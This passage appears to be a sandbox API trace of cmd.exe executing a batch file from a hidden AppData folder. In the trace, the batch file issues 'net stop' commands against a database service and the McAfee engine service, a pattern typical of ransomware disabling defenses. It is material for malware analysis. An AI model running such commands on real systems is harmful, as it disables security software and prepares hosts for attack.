lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0199.884] SetErrorMode (uMode=0x0) returned 0x1 [0199.884] GetProcessHeap () returned 0x3e0000 [0199.884] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0199.884] GetProcessHeap () returned 0x3e0000 [0199.884] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0199.884] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.884] GetProcessHeap () returned 0x3e0000 [0199.884] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0199.884] GetProcessHeap () returned 0x3e0000 [0199.884] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0199.885] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.896] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.897] GetLastError () returned 0x2 [0199.897] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.897] GetLastError () returned 0x2 [0199.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.898] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.898] GetLastError () returned 0x2 [0199.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.899] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.899] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.900] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0199.900] SetErrorMode (uMode=0x0) returned 0x1 [0199.900] GetProcessHeap () returned 0x3e0000 [0199.900] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0199.900] GetProcessHeap () returned 0x3e0000 [0199.900] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0199.900] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.900] GetProcessHeap () returned 0x3e0000 [0199.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0199.900] GetProcessHeap () returned 0x3e0000 [0199.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0199.901] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.901] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.901] GetLastError () returned 0x2 [0199.902] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.902] GetLastError () returned 0x2 [0199.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.902] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0199.903] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0199.903] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.903] GetLastError () returned 0x2 [0199.903] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0199.903] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0199.904] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.904] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0199.904] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0199.904] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0199.905] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0199.905] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSOLAP$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSOLAP$TPSAMA /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSOLAP$TPSAMA /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x790, dwThreadId=0xa7c)) returned 1 [0199.908] CloseHandle (hObject=0x78) returned 1 [0199.908] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0199.908] GetProcessHeap () returned 0x3e0000 [0199.908] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.908] GetEnvironmentStringsW () returned 0x3f8408* [0199.909] GetProcessHeap () returned 0x3e0000 [0199.909] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.909] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.909] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0200.034] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0200.034] CloseHandle (hObject=0x74) returned 1 [0200.034] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0200.035] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0200.035] GetProcessHeap () returned 0x3e0000 [0200.035] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.035] GetEnvironmentStringsW () returned 0x3f8408* [0200.035] GetProcessHeap () returned 0x3e0000 [0200.035] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.035] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.035] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0200.035] GetProcessHeap () returned 0x3e0000 [0200.035] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.035] GetEnvironmentStringsW () returned 0x3f8408* [0200.035] GetProcessHeap () returned 0x3e0000 [0200.035] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.035] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.035] GetProcessHeap () returned 0x3e0000 [0200.035] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0200.035] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0200.035] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.035] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0200.036] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.036] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0200.036] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.036] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0200.036] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.036] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0200.036] SetConsoleInputExeNameW () returned 0x1 [0200.036] GetConsoleOutputCP () returned 0x1b5 [0200.036] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0200.037] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0200.037] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0200.037] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.037] SetFilePointer (in: hFile=0x74, lDistanceToMove=2979, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xba3 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0200.037] GetProcessHeap () returned 0x3e0000 [0200.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0200.038] GetProcessHeap () returned 0x3e0000 [0200.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0200.038] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.038] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xba3 [0200.038] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xd1e, lpOverlapped=0x0) returned 1 [0200.038] SetFilePointer (in: hFile=0x74, lDistanceToMove=3012, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbc4 [0200.038] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop McAfeeEngineService /y\r\nrviceΓÇ¥ /y\r\n¥ /y\r\nlures\r\nnded\r\n") returned 33 [0200.038] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.038] GetFileType (hFile=0x74) returned 0x1 [0200.038] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.038] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbc4 [0200.038] GetProcessHeap () returned 0x3e0000 [0200.038] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0200.038] GetProcessHeap () returned 0x3e0000 [0200.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0200.042] _tell (_FileHandle=3) returned 3012 [0200.042] _close (_FileHandle=3) returned 0 [0200.042] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0200.042] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0200.042] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0200.042] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0200.042] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0200.042] _wcsicmp (_String1="net", _String2="CD") returned 11 [0200.042] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0200.042] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0200.042] _wcsicmp (_String1="net", _String2="REN") returned -4 [0200.042] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0200.042] _wcsicmp (_String1="net", _String2="SET") returned -5 [0200.042] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0200.042] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0200.042] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0200.042] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0200.042] _wcsicmp (_String1="net", _String2="MD") returned 1 [0200.042] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0200.042] _wcsicmp (_String1="net", _String2="RD") returned -4 [0200.042] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0200.042] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0200.042] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0200.042] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0200.042] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0200.042] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0200.042] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0200.042] _wcsicmp (_String1="net", _String2="VER") returned -8 [0200.043] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0200.043] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0200.043] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0200.043] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0200.043] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0200.043] _wcsicmp (_String1="net", _String2="START") returned -5 [0200.043] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0200.043] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0200.043] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0200.043] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0200.043] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0200.043] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0200.043] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0200.043] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0200.043] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0200.043] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0200.043] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0200.043] SetErrorMode (uMode=0x0) returned 0x1 [0200.043] GetProcessHeap () returned 0x3e0000 [0200.043] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0200.043] GetProcessHeap () returned 0x3e0000 [0200.043] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0200.044] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.044] GetProcessHeap () returned 0x3e0000 [0200.044] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0200.044] GetProcessHeap () returned 0x3e0000 [0200.044] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0200.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.045] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.045] GetLastError () returned 0x2 [0200.045] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.045] GetLastError () returned 0x2 [0200.046] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.046] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.047] GetLastError () returned 0x2 [0200.047] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.047] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.047] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.048] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0200.048] SetErrorMode (uMode=0x0) returned 0x1 [0200.048] GetProcessHeap () returned 0x3e0000 [0200.048] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0200.048] GetProcessHeap () returned 0x3e0000 [0200.048] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0200.048] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.048] GetProcessHeap () returned 0x3e0000 [0200.048] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0200.048] GetProcessHeap () returned 0x3e0000 [0200.048] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0200.049] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.049] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.049] GetLastError () returned 0x2 [0200.050] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.050] GetLastError () returned 0x2 [0200.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.050] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0200.051] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0200.051] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.051] GetLastError () returned 0x2 [0200.051] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0200.051] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0200.052] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.052] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0200.052] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0200.052] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0200.053] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0200.053] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop McAfeeEngineService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop McAfeeEngineService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop McAfeeEngineService /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xac8, dwThreadId=0x664)) returned 1 [0200.056] CloseHandle (hObject=0x74) returned 1 [0200.056] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0200.056] GetProcessHeap () returned 0x3e0000 [0200.056] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.056] GetEnvironmentStringsW () returned 0x3f8408* [0200.057] GetProcessHeap () returned 0x3e0000 [0200.057] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.057] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.057] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0200.187] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0200.187] CloseHandle (hObject=0x78) returned 1 [0200.188] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0200.188] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0200.188] GetProcessHeap () returned 0x3e0000 [0200.188] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.188] GetEnvironmentStringsW () returned 0x3f8408* [0200.188] GetProcessHeap () returned 0x3e0000 [0200.188] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 